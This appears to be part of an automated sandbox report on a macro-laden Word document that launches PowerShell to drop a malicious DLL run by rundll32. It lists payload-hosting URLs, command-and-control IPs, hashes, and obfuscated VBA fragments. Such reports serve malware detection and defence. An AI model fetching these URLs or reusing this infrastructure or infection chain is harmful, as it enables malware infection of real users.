http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000005.00000002.2098095500.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105644253.00000000028E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106881102.0000000002890000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000005.00000002.2096126054.00000000003C4000.00000004.00000020.sdmp	false		high
http://zieflix.teleskopstore.com/cgi-bin/Gt3S/	powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	true	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://somanap.com/wp-admin/P/	powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp	false		high
https://fnjbq.com/wp-includes/rlR/	powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://wap.zhonglisc.com/wp-includes/QryCB/	powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.%s.comPA	powershell.exe, 00000005.00000002.2098095500.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105644253.00000000028E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106881102.0000000002890000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.piriform.com/cclea;	powershell.exe, 00000005.00000002.2096126054.00000000003C4000.00000004.00000020.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp	false		high
https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/	powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://givingthanksdaily.com/qlE/VeF/	powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
176.53.69.151	unknown	Turkey		42926	RADORETR	true
5.2.136.90	unknown	Romania		8708	RCS-RDS73-75DrStaicoviciRO	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	336496
Start date:	06.01.2021
Start time:	08:48:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	pack 2254794.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@18/8@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 88% (good quality ratio 84.5%) Quality average: 76.7% Quality standard deviation: 26.2%
HCA Information:	Successful, ratio: 88% Number of executed functions: 94 Number of non-executed functions: 90
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:48:40	API Interceptor	1x Sleep call for process: msg.exe modified
08:48:41	API Interceptor	31x Sleep call for process: powershell.exe modified
08:48:46	API Interceptor	946x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
176.53.69.151	informazioni-0501-012021.doc	Get hash	malicious	Browse	petafilm.com/wp-admin/4m/
	rapport 40329241.doc	Get hash	malicious	Browse	petafilm.com/wp-admin/4m/
	Dati_012021_688_89301.doc	Get hash	malicious	Browse	petafilm.com/wp-admin/4m/
	2199212_20210105_160680.doc	Get hash	malicious	Browse	petafilm.com/wp-admin/4m/
	ARCHIVO_FILE.doc	Get hash	malicious	Browse	petafilm.com/wp-admin/4m/
	doc_X_13536.doc	Get hash	malicious	Browse	petafilm.com/wp-admin/4m/
	ytgeKMQNL2.doc	Get hash	malicious	Browse	petafilm.com/wp-admin/4m/
5.2.136.90	DATA-480841.doc	Get hash	malicious	Browse	5.2.136.90/6tycsc/
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/
	pack-91089 416755919.doc	Get hash	malicious	Browse	5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/
	Adjunto.doc	Get hash	malicious	Browse	5.2.136.90/nmjn7tw17/z6mjkdfb6xb/85tf0qh6u/bqo6i0tmr9bo/
	arc-NZY886292.doc	Get hash	malicious	Browse	5.2.136.90/zpm1364ks766bq5tfgm/of4c87wiptl9gmt2iai/xi3tkrikfkjmyw07j7s/8758g9rolh/96kjwl7hgnpltacdm2/gdi8d56ispt49sa36ql/
	NQN0244_012021.doc	Get hash	malicious	Browse	5.2.136.90/xgyqftp8/ypox5kzx24gfln5utkh/ejrffzc54r5vq/itkmc/prx4/
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	5.2.136.90/tqndp5p5qacps4njp6/p6z0bktcdw7ja/i1rph/
	Scan-0767672.doc	Get hash	malicious	Browse	5.2.136.90/7hs0yieqcvglex40v9/th111ygicc1htiecx/eto0vvprampeftpmcc/
	Documento-2021.doc	Get hash	malicious	Browse	5.2.136.90/n5z35/rncfyghpt3nn9/twyyh8xn/dm5hb/
	informazioni-0501-012021.doc	Get hash	malicious	Browse	5.2.136.90/kcdo20u2bqptv6/
	rapport 40329241.doc	Get hash	malicious	Browse	5.2.136.90/6s0p53atjr9ihwygvd/svxo4o84aueyhj9v5m/5lqp30jb/g0ur1kwrzvgj3o0gmmo/dw8my2m1fzzo/
	info_39534.doc	Get hash	malicious	Browse	5.2.136.90/5ciqo/dhqbj3xw/
	Dati_012021_688_89301.doc	Get hash	malicious	Browse	5.2.136.90/l7tybna/g7nyjudv6/gf8bykzqxpzupj/wr2o0u8id88pf7dgmx3/9zupu1q7mb/wtjo6ov5niso7jo0n/
	2199212_20210105_160680.doc	Get hash	malicious	Browse	5.2.136.90/vcpu82n/rvhhoco3em4jtl/qxey084opeuhirghxzs/bm8x5w07go1ogzflbv/32imx8ryeb30/bd7tg46kn/
	ARCHIVO_FILE.doc	Get hash	malicious	Browse	5.2.136.90/ji02pdi/39rfb96opn/
	doc_X_13536.doc	Get hash	malicious	Browse	5.2.136.90/glhz448zi9act/ieva/q040/sl9198fns4q2/
	REP380501 040121.doc	Get hash	malicious	Browse	5.2.136.90/09hsu3aavqd4/8opns7c/oxp5fp7awb/
	doc-20210104-0184.doc	Get hash	malicious	Browse	5.2.136.90/78ro59myn48w9a6ku/bcgjwwwuc/
	7823099012021.doc	Get hash	malicious	Browse	5.2.136.90/bl7bvpp8itof0dvu5j2/nwcw9ztkp/yjrulniti57vcwwk67t/6u49kr6/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
petafilm.com	informazioni-0501-012021.doc	Get hash	malicious	Browse	176.53.69.151
	rapport 40329241.doc	Get hash	malicious	Browse	176.53.69.151
	Dati_012021_688_89301.doc	Get hash	malicious	Browse	176.53.69.151
	2199212_20210105_160680.doc	Get hash	malicious	Browse	176.53.69.151
	ARCHIVO_FILE.doc	Get hash	malicious	Browse	176.53.69.151
	doc_X_13536.doc	Get hash	malicious	Browse	176.53.69.151
	ytgeKMQNL2.doc	Get hash	malicious	Browse	176.53.69.151

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RCS-RDS73-75DrStaicoviciRO	DATA-480841.doc	Get hash	malicious	Browse	5.2.136.90
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	5.2.136.90
	pack-91089 416755919.doc	Get hash	malicious	Browse	5.2.136.90
	Adjunto.doc	Get hash	malicious	Browse	5.2.136.90
	arc-NZY886292.doc	Get hash	malicious	Browse	5.2.136.90
	NQN0244_012021.doc	Get hash	malicious	Browse	5.2.136.90
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	5.2.136.90
	Scan-0767672.doc	Get hash	malicious	Browse	5.2.136.90
	Documento-2021.doc	Get hash	malicious	Browse	5.2.136.90
	informazioni-0501-012021.doc	Get hash	malicious	Browse	5.2.136.90
	rapport 40329241.doc	Get hash	malicious	Browse	5.2.136.90
	info_39534.doc	Get hash	malicious	Browse	5.2.136.90
	Dati_012021_688_89301.doc	Get hash	malicious	Browse	5.2.136.90
	2199212_20210105_160680.doc	Get hash	malicious	Browse	5.2.136.90
	ARCHIVO_FILE.doc	Get hash	malicious	Browse	5.2.136.90
	doc_X_13536.doc	Get hash	malicious	Browse	5.2.136.90
	REP380501 040121.doc	Get hash	malicious	Browse	5.2.136.90
	doc-20210104-0184.doc	Get hash	malicious	Browse	5.2.136.90
	7823099012021.doc	Get hash	malicious	Browse	5.2.136.90
	vDKnVBINrY.exe	Get hash	malicious	Browse	86.120.144.206
RADORETR	ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.doc	Get hash	malicious	Browse	185.225.36.38
	informazioni-0501-012021.doc	Get hash	malicious	Browse	176.53.69.151
	N.11389944 BS 05 gen 2021.doc	Get hash	malicious	Browse	185.225.36.38
	PSX7103491.doc	Get hash	malicious	Browse	185.225.36.38
	Beauftragung.doc	Get hash	malicious	Browse	185.225.36.38
	rapport 40329241.doc	Get hash	malicious	Browse	176.53.69.151
	Dati_012021_688_89301.doc	Get hash	malicious	Browse	176.53.69.151
	2199212_20210105_160680.doc	Get hash	malicious	Browse	176.53.69.151
	#U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.doc	Get hash	malicious	Browse	185.225.36.38
	ARCHIVO_FILE.doc	Get hash	malicious	Browse	176.53.69.151
	doc_X_13536.doc	Get hash	malicious	Browse	176.53.69.151
	ytgeKMQNL2.doc	Get hash	malicious	Browse	176.53.69.151
	vrhiyc.exe	Get hash	malicious	Browse	46.45.148.196
	ucrcdh.exe	Get hash	malicious	Browse	46.45.148.196
	lrbwh.exe	Get hash	malicious	Browse	46.45.148.196
	ECS9522020111219400053_19280.exe	Get hash	malicious	Browse	46.235.9.150
	BdBdbczoqd.exe	Get hash	malicious	Browse	185.84.181.88
	N89uC6re8k.exe	Get hash	malicious	Browse	185.84.181.89
	SUmXCDNE9J.exe	Get hash	malicious	Browse	185.84.181.88
	amEXFGJafW.exe	Get hash	malicious	Browse	185.84.181.88

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F52C8AA2-B174-499E-B3BD-E7523F18DF93}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbWwWl:sZ
MD5:	3B7B4F5326139F48EFA0AAE509E2FE58
SHA1:	209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
SHA-256:	D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
SHA-512:	C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	74
Entropy (8bit):	4.37618297427639
Encrypted:	false
SSDEEP:	3:M1uTspu4oNvsspu4omX1uTspu4ov:MsTspFGUspFGTspFy
MD5:	1575B4B03068E9EB1C790279D6F015E9
SHA1:	B03BA64F155CB89C56F2BEFD4834DF9592D7FA43
SHA-256:	172739674EBD8866CDE6E438FF08DBC63AE51F20C6A69F78BDDCF58B1FEE33AF
SHA-512:	02F358E4E8C884FE42D825C68FAA8B656C9D44827F8B17207BD360C4EED0F75C233DDB00789531D1C78FC9009234C9FD0E0B9870074100CE8D1D11B9475B39A3
Malicious:	false
Preview:	[doc]..pack 2254794.LNK=0..pack 2254794.LNK=0..[doc]..pack 2254794.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\pack 2254794.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 6 15:48:37 2021, length=173056, window=hide
Category:	dropped
Size (bytes):	2048
Entropy (8bit):	4.54485733617009
Encrypted:	false
SSDEEP:	48:8y/XT0jFJ7X8ZjY17XQ/Qh2y/XT0jFJ7X8ZjY17XQ/Q/:8y/XojFJ7XIY17XQ/Qh2y/XojFJ7XIYF
MD5:	E3FBD587B484224CD312DA1A8614455A
SHA1:	E20B34A9EDFD3E61071E6D6EFC21FA59E85D4056
SHA-256:	C4B15C49D33DC71DBFEF56B453F4F0B791BCE90E123A0F54154E3D0C6EA17935
SHA-512:	E3A2F426184A78FBC82878300F15DB755A2AC3ACAB2F5EB13F47C1B3415FDCE6DAAB16D10334F398FA4EC90E7420788DE87E1ACE617C537017AB74148CFDC9AB
Malicious:	false
Preview:	L..................F.... ......{.....{..D...K................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2.....&R.. .PACK22~1.DOC..N.......Q.y.Q.y...8.....................p.a.c.k. .2.2.5.4.7.9.4...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\pack 2254794.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.p.a.c.k. .2.2.5.4.7.9.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......405464..........D_....3N...W...9F.C...........[D_....3N...W

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TTTIA5RUAT24SOYOMUL4.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.588015572863861
Encrypted:	false
SSDEEP:	96:chQCsMqbqvsqvJCwo1z8hQCsMqbqvsEHyqvJCworfzv1YkHKf8OzlUVLIu:cy+o1z8yWHnorfzv+f8OoIu
MD5:	C0AE2CE8B209C1783BCC5D0CF773F7B1
SHA1:	C42001B1F8B58DB5FB3E44B6743D6B05A52B8FC2
SHA-256:	0A8DF82BDDA3CC1BC76384419D818EB89A6D4576954D29C15B2360B001140F38
SHA-512:	322BC8DE5B93082BBD69AC84DCA42E997507E91EEEF242E8281353FF4CFFCE0D3ECF73F61234358E48A032AD2DCCAA1E7882EC44F1B09B749746F8C676C24028
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	192000
Entropy (8bit):	7.4703735707732735
Encrypted:	false
SSDEEP:	3072:SwbpDnn9FCrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:Ssl9FSaBYF0nVp2MJHybR8dS9
MD5:	920A3E39E71AC0FC7ECAC1630AADAF7A
SHA1:	2DD3A5B2521C723914D1518111AE27E1825FCD0F
SHA-256:	EEF95A9BB33B7458E7EA3AF95B79CDF7B5016C89B70778A6B60E71010EDADF73
SHA-512:	D6FE3C10742B6B40A837DC1F5B1700FDF1093243A84E80102FEE0BB45CFC43B2002E76F0F635F9C47598E67E061D70B98C1C7862A1ACC1D6832C5EBE5844192E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..wT..wT..wT......wT.....wT......wT.-....wT.-....wT..wU.SwT.-....wT......wT......wT......wT..w...wT......wT.Rich.wT.........PE..L......_...........!.........J.......E.......................................0.......................................................P.. ...............................8...............................@............................................text............................... ..`.rdata...J.......L..................@..@.data....-... ......................@....rsrc... ....P......................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$ck 2254794.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: backing up Grove Avon systematic copy THX Steel functionalities Upgradable infrastructure Technician, Author: Clmence Nguyen, Template: Normal.dotm, Last Saved By: Quentin Collet, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 06:14:00 2021, Last Saved Time/Date: Tue Jan 5 06:14:00 2021, Number of Pages: 1, Number of Words: 3222, Number of Characters: 18371, Security: 8
Entropy (8bit):	6.685015184938068
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	pack 2254794.doc
File size:	172398
MD5:	1e1ec8dd9b25146cc2104be64d6f9bf0
SHA1:	d7253cfd0015dbb38c6e2bb602216468d83e4b4a
SHA256:	048e5df452e4ba303faa434c138839e4fdf6e8e5004ced58aa30569573eda17e
SHA512:	8941fa4e0ef02a23663db80b63cae810a059a711e1254ea404ed63607a56ebac5a1e7f2d86279edbe4120225b2ac0ee4e4b11071d73db7b1867140d53723be23
SSDEEP:	3072:59ufstRUUKSns8T00JSHUgteMJ8qMD7g5CeISWpsbP:59ufsfgIf0pL57I/8P
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "pack 2254794.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:	backing up Grove Avon systematic copy THX Steel functionalities Upgradable infrastructure Technician
Author:	Clmence Nguyen
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Quentin Collet
Revion Number:	1
Total Edit Time:	0
Create Time:	2021-01-05 06:14:00
Last Saved Time:	2021-01-05 06:14:00
Number of Pages:	1
Number of Words:	3222
Number of Characters:	18371
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	-535
Number of Lines:	153
Number of Paragraphs:	43
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: Oi5oelv0_s4, Stream Size: 17886

General
Stream Path:	Macros/VBA/Oi5oelv0_s4
VBA File Name:	Oi5oelv0_s4
Stream Size:	17886
Data ASCII:	. . . . . . . . . \| . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . [ k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 93 30 00 00 00 00 00 00 01 00 00 00 ae c5 5b 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
DyjPBI
dLrgANHCG
EajdMLeD
rgBSB
Object
yjNpyrf
rJqMZII
PGiog
T_dehutl_mggmhizd
EUMDPGt
xkJxAAC
AybxtEBCJ.Close
JhiYfXc:
VusSK
"fUwLgjVtQyH"
UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
bGnhXCA
VJbwzTDT.Close
VwnpBElhO
MMAqSI
UPhhYZEF
"bVawaPADALVlWFFA"
NFWzF
"HiTyACJmCuGQFFJ"
sGvJJWh
PmBxcD:
SfMKIOk
"TthascRlxHZH"
AybxtEBCJ:
SFmrEDJ
zOBhOx
fUGQf
numuq
rEeiBJ
ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
RkPWCDPC
JADCpjk
PmBxcD
pDPzBJmM
bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
WSARpB
EUMDPGt.Close
HnBvAEH
"WXovaGHxqSlUt"
QEIFFM
bPFNuJ.WriteLine
"PzrrnIFtpmxAx"
EUMDPGt:
ilONFzHG
"akTuJaIGmZrUyF"
qpOWEIHHA
yJouG
XwZxsHCGt
FTalMbF
XDJPUW
"ALpzEMcwuWl"
gQxBD:
UUoAB
tcYiEMeRH.Close
nIHrI
eUdbDAHHs.WriteLine
"uJnfBHIPFKBxHBmEE"
FPWaF
JADCpjk.WriteLine
xxYeFGUAH
rfDgD
njKwJdA.WriteLine
"bOOXnOJYtbRAbm"
VJbwzTDT:
RkPWCDPC:
UPhhYZEF.Close
eWkHqVao
Resume
XKPUEfhk
RLurCDDF
gglHam
"budRDJKVnJRU"
DRrKpoA
"]an"
lgZgGO
"gcZaHCGUVJsFmL"
"yKdJWHAniqHFCB"
ThHBBDu
tcYiEMeRH.WriteLine
waSbS
VfJHAA
vutdEkdRL
NSiRQzd
"frvvJFHIkftmZHE"
OtQPAJH
AybxtEBCJ.WriteLine
XTdPHz
OBwIBy:
JADCpjk.Close
QZjuH
"DkRmTYGAMxqHI"
zOQlGPVC
"dWnMFoTBPDqeJK"
jPnRGLC
CbMZSLFAM
kboRA
ORIzFDySE
DRrKpoA.Close
VAEDpBCV
uJSEDH:
QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
"bAurYaGPwGKRiG"
bPFNuJ
"koDuGqAOJBlLgZIEme"
DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
hiZkEEF.WriteLine
txKQv
xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
vtDUw
RkPWCDPC.WriteLine
aLGptGA
"kWzGMzIVefGB"
"ncDMUIadusSIDx"
VB_Name
RkPWCDPC.Close
"JCgblEAJizSfW"
uJSEDH
eUdbDAHHs.Close
"HfXAPQQbXKJHFGu"
eBddHTXP
AybxtEBCJ
OBwIBy
RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
VJbwzTDT.WriteLine
ItSfCDCB
Mid(Application.Name,
JhiYfXc.Close
PAxhJ
"TJahKRWdrvHFIy"
xOnWA
xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
"lRcGHADAHrlHJJA"
oOysMtDG
syDRd
dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
cTfCJ
hiZkEEF
"GhifcDKlpA"
oOysMtDG.WriteLine
FgmzCEm
bPFNuJ:
"HwixyOCYxmojd"
UMzHfyAfA
oOysMtDG:
"eSpcpGDZncccrFb"
oMcHDXEF
reTrs
"BWSOKPyHMnSQxi"
EJEApM
JADCpjk:
XjhOHEMDC
gQxBD
"xtsHGQjpNzDIYJ"
pSFXACJ
wUoJIFDD
HOkLRDGd
njKwJdA.Close
RvFOAEPH
HMyHCQCGu
